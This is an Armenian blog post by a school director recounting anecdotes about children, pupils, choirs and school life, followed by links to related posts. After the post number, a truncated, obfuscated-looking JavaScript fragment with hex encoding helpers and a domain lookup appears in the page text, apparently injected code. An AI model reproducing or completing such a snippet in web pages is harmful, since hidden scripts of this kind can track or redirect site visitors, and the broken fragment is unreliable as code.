Ինչի՞ նման կլիներ իմ գիրը առանց  այդ սիրուն պատմությունների… Չէր լինի, կընդհատվեր վաղուց… Բայց տեսեք, կա իմ գիրը, իմ հավեսը՝ պատմելու ինձ հետ կատարվածը, իմ տեսածը-լսածը՝ անընդհատ…

Դավիթ Բլեյանն առավոտ մի կոնֆետ է վերցրել՝ չուփա-չուպս, իր նոր ավտոբուսը, որ  երեկ մայրիկին գնել է տվել խանութում… 2 կգ տավարի միս ու ավտոբուս․․․
— Ավտոբուս չունեի, պա՜պ, մնացել էի առանց ավտոբուս… Տե՛ս…
Տեսնելու բան է, խումբ տանելու։ Կոնֆետն էլ որոշել է տանել Ալեքսին… թե ո՜նց է իր քսանից ավելի ընկեր-ընկերուհու միջից ջոկել հենց Ալեքսին, ո՞նց է տալու… Մեքենայի մեջ, առավոտ՝ ճանապարհին, իր պարտեզի մասին երկա՜ր պատմում է Դավիթը. պատմությու՜ն… Ո՛նց է տվել Ալեքսին, հետո միջամտել է Կարապետյան Դավիթը թե՝ էդ ես պիտի ուտեմ, Դավիթը ինձ պիտի տար…
— Հո չկռվեցի՞ք կենֆետի համար, Դավի՛թ…
— Չէ՛, պապ, մենք որ կռվում ենք, այսպես շուտ բարիշում ենք… Ցույց է տալիս ձեռքով «չինգաչունգ»…
— Պա՜պ, էլ չթողնես՝ մի հատ կոնֆետ տանեմ խումբ… Ավելի լավ է մի մեծ աման էն մեր տեսած ելակից տանեմ խումբ, բոլորս նստենք, մեկ-մեկ ուտենք, պոչերը շարենք… Դու սիրում ես, չէ՞… համ էլ գլուխդ չեմ ցավեցնի իմ պատմելով… Չէիր լսո՞ւմ, պա՜պ..

Այսպես՝ տառացի չէ, բայց բառացի, նշանակությամբ պատմեցի…
Կամ էլ Վաչագան թագավորի պատմությունը, ում հանդիպեցի Դպրոց-պարտեզի մուտքի մոտ… Թադևոսյան Աշխենի դասարանից, պատմել եմ իր մասին…
— Ողջո՜ւյն, Վաչագան թագավորին…
Թագավորավարի ժպտում է, ողջագուրվում։
— Ի՞նչ կհրամայես քո նազիր-վեզիրին…
Ժպիտը դեմքին՝ նշանավոր ասաց…
— Դո՞ւք նազիր-վեզիր. չի՛ լինի։…
— Ինչո՞ւ, դու Վաչագան թագավորը չե՞ս…
— Վաչագան թագավորն եմ։
— Մյուսներն ովքե՞ր են, թագավորն ապրած կենա…
— Պալատականներ… հպատակներ… զորք,- թվարկում է Վաչագան թագավորը՝ դանդաղ, խելացի…
— Նազիր-վեզիրն էլ է էդ պալատականների մեջ,- ավելացնում եմ… Թագավորությանը տնօրեն կլինի՞։ Վերջը ես ո՞վ եմ…
-Չէ՛, լավ չի լինի… Ես գնացի… Ինձ սպասում են։
Թագավորն ամենքինն է՝ իր իրավունքով, գնաց…

Միջին դպրոցի այգու բարեկարգման աշխատանքներ:
Լուսանկարները՝ Գոհար Եղոյանի:

Նոր դպրոցի հինգ-վեց տարեկան Արեգին հանդիպեցի հեծանվով՝ իր ընկերների հետ, միջանցքում… Մեր անշեմ-ընդարձակ հարկերը հենց հեծանիվ քշելու համար են… Տեսանելի կայանատեղին է նոր՝ թաքուբիր հեծանիվներով… Կռասավեց տեսարան…
— Ըսենց դպրոց կլինի՞… Ի՞նչ անուն տաս…- սադրում եմ իբր…
— Կլինի՛, մեր դպրոցը ըսենց է,- ցույց է տալիս բութը վեր նշանով…- Անունն  էլ՝ շատ լավ դպրոց…
— Ջա՜ն, դպրո՞ց… դե որ այդպես է՝ հետևիցս արի…
Ու ես հեծանվով առաջնորդում եմ դեպի ներքին բակ, թեքահարթակով, հետո վեր՝ անտառ դարձող խորդուբորդով, լանջիկով…
— Գալի՞ս ես… հետ չմնաս-մոլորվես անտառում…
— Հասնում եմ, տնօրեն,- ու որտեղից-որտեղ հայտնվում է առաջս…
Լա՜վ է քշում։

«Սեբաստացիներ» ուսուցչական երգչախմբի համերգային շրջագայությունը Վարդաձորում:
Լուսանկարները՝ Լուսինե Աբրահամյանի:

Տեսարա՜ն է իմ մուտքը անծանոթի հետ, Մայր դպրոցի վարդաստանով… Այսպիսի բաց հանրակրթական հանրային, աշխույժ  տարածք՝ ներսով, դրսով. ուրիշ մեկը ցույց տվեք։ Մուտքի մոտ հանդիպում եմ երիտասարդ կնոջ՝ երեխան ձեռքին… մեղավոր դիմում է.
— Ձեռքիցս բռնել, քաշում է՝ հենց հիմա տար ինձ էդ դպրոցը, ես տեսել եմ իրենց սովորողներին…
— Դուք երեխային լսեք, կարծեմ՝ այդպես եք մեծացրել… Հիմա հանդիպեցինք, ոչ մի դժվարություն…
— Բայց սա դպրո՞ց է, պարոն Բլեյան, այսպիսի դպրո՞ց է լինում, ամեն ինչ զարմանալի է…
Դուք ասացիք՝ զարմանալի՜ դպրոց…

Մարմարյա սրահում վալս են փորձում շրջանավարտները… Տեսարան… Ես ընդհատում եմ
— Պատմե՛ք ձեր կյանքը, ձեր օրը, ինքնաբուխ, անմիջական, անհապաղ պատմե՛ք… Սիրունացրե՛ք մեդիան, մեդիան դրա համար է…
Իսկ ընթերցարանում, Մարմարյա սրահից թափանցիկ բաժանումով, Արևիկ Ներսիսյանի 7-րդ դասարանը և Մարգարիտ Սարգսյանը պարապմունք են անցկացնում՝ չես կտրի… Կլանված կարդում են… Իսկական ընթերցանության մեջ ընկղմված դեռահասներ… Ինչպես երեկ, քսան տարի անց, հանդիպել էին ընթերցարանում 1993-1995-ի «Ծիր Կաթին»-ն ու «Մենք» տպագիր թերթերի ու այսօրվա մեդիագիր բլոգեր սեբաստացիները… Իմ կյանքի սովորական, սիրուն պատմություններից մեկը… Սիրուն է…
Սիրուն էր և Գեղարվեստում՝ բացօթյա, մեր Սյուզին ասաց՝ մեդիաուրբաթը մեր կրթական պարտեզի Գեղարվեստում… Ես չեմ սիրում — չեմ դիմանում, երբ ինձ պարգևատրում են, գովաբանում… Ես՝ ես եմ, երբ կարևորում եմ ձեր-մեր գործը, հաճույքով բարձրանում եմ հարթակին ու արվածի-գործի համար սովորող-ուսուցչին պարգևատրում… Ի՜նչ լավ տիտիկ էինք արել և ի՜նչ ազնիվ էին հնչում մեր երգչախմբերի կատարումները՝ որպես ձոներ սպասումի…

Դետալներ Գյումրիից:
Լուսանկարները՝ կրթահամալիրի շրջանավարտ Մանե Գևորգյանի:

Մի ուրիշ կյանքում կլինեի ռեժիսոր, շոումեն երևի, պարտիզպան՝ հաստատ… աղբակուլ… թերապևտ… երևի… Ահա ինչու՝ մի կյանքում, այս կյանքում ձեզ հետ ես Տիար դարձա… Սիրուն աշխատանք է․ երբեք իմ աշխատանքից չեմ բողոքել… Ես պատմում եմ սիրուն պատմություններով լի իմ օրվա, շաբաթի մասին… Դո՛ւք էլ պատմեք, խնդրում եմ։

Ահա ինչու՝ ես առանձնացնում եմ հունիսը՝ իմ-ձեր կյանքում, որպես ամառային սիրուն պատմությունների շրջան…

#671

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "ashotbleyan.mskh.am"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

Թողնել պատասխան

Ձեր էլ-փոստի հասցեն չի հրապարակվելու։ Պարտադիր դաշտերը նշված են *-ով

Explore More

Որտեղ էլ լինեմ, կհիշեմ ու կասեմ այն խոսքերը, որ հիմա չեմ գտնում…

Վերնագիրը՝ Քնքուշ Բաղդասարյանի խոսքից։ Մեզանում հերթապահ-շնորհավորական-«հավուր պատշաճի» խոսքը չարաշահվում է։ Տոն է, ծնունդ է, միջոցառում է, հավաք է մի առիթով, ու գնա՜ց… Խոսքը կարող է զբաղեցնել հավաքի կեսը, ու ձանձրույթը կարող

Հայրի՜կ, մենք իր ոռնոցի ձայնը կլսե՞նք

Դավիթ Բլեյանի հետ պայմանավորվել ենք. մեկ շաբաթով Մաշային ուղարկում ենք իր տատիկի մոտ, հեռավոր մի գյուղ, նրա արջին՝ հեռավոր անտառներ, թող առանց բռնության, առանց արհեստական կենցաղի ապրի ազատ, իր ընկեր

Աշխատիր ճի՛շտ ճանապարհի վրա և գոհացի՛ր ունեցածովդ․․․

Իմ գրի այս վերնագիրը առավոտվա մեր երկար զրույցից հետո Արմինեն ընտրեց ու չի սխալվել։ Ես սկսում եմ, որպես ընտանեկան ընթերցանություն, Դավթին Թումանյան կարդալ, հերթով. «Ոսկի քաղաքի» մարդկանց, Գոհար թագուհուն դեռ կհանդիպենք։